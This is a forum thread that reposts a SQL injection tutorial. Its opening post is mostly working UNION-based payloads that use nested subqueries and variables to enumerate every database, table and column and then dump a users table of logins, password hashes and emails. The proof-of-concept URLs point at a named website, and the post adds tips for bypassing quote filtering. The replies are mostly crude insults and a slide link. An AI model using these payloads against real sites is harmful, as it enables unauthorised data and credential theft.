ionut97 Posted December 29, 2012 Report Share Posted December 29, 2012 by ???Dan & DenJackerWhat we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First of, the database/table/columns. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) PoC:http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function.View the source, and we see every single database/table/column accessible. Now, to grab information from the columns.(select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)PoC:http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+Sursa:TUTORIAL : [All DB In [1] Request] 2 Quote Link to comment Share on other sites More sharing options...
denjacker Posted January 2, 2013 Report Share Posted January 2, 2013 ???Dan is gay ! Quote Link to comment Share on other sites More sharing options...
boogy Posted January 2, 2013 Report Share Posted January 2, 2013 Rely nice Quote Link to comment Share on other sites More sharing options...
Andrei Posted January 2, 2013 Report Share Posted January 2, 2013 Daca imi amintesc bine, denjacker a prezentat la primul defcamp sintaxa. gresesc? Quote Link to comment Share on other sites More sharing options...
denjacker Posted January 2, 2013 Report Share Posted January 2, 2013 (edited) Daca imi amintesc bine, denjacker a prezentat la primul defcamp sintaxa. gresesc?http://www.slideshare.net/DefCamp/advanced-data-mining-in-my-sql-injections-using-subqueries-and-custom-variablesIn slide este si varianta cu benchmark .. cea despre care ratangii de pe HF inca n-au habar.Daca o posteaza unu acolo, imediat apar zeci de tutoriale si se umfla toti ca o stiau de cand erau ei mici.Mue HF, MUE 8===> ???Dan Edited January 2, 2013 by denjacker Quote Link to comment Share on other sites More sharing options...
Andrei Posted January 2, 2013 Report Share Posted January 2, 2013 Who the fuck is Dan?!LE: Mai arunca un buzz cand esti on. Quote Link to comment Share on other sites More sharing options...
denjacker Posted January 2, 2013 Report Share Posted January 2, 2013 This is ???Dan. He touches himself at night ! Quote Link to comment Share on other sites More sharing options...
Andrei Posted January 2, 2013 Report Share Posted January 2, 2013 E bine ca macar esti mentionat la autori, desi in realitate ordinea ar trebui sa fie invers. Trebuie sa iasa si astfel de specimene in fata din cand in cand. Quote Link to comment Share on other sites More sharing options...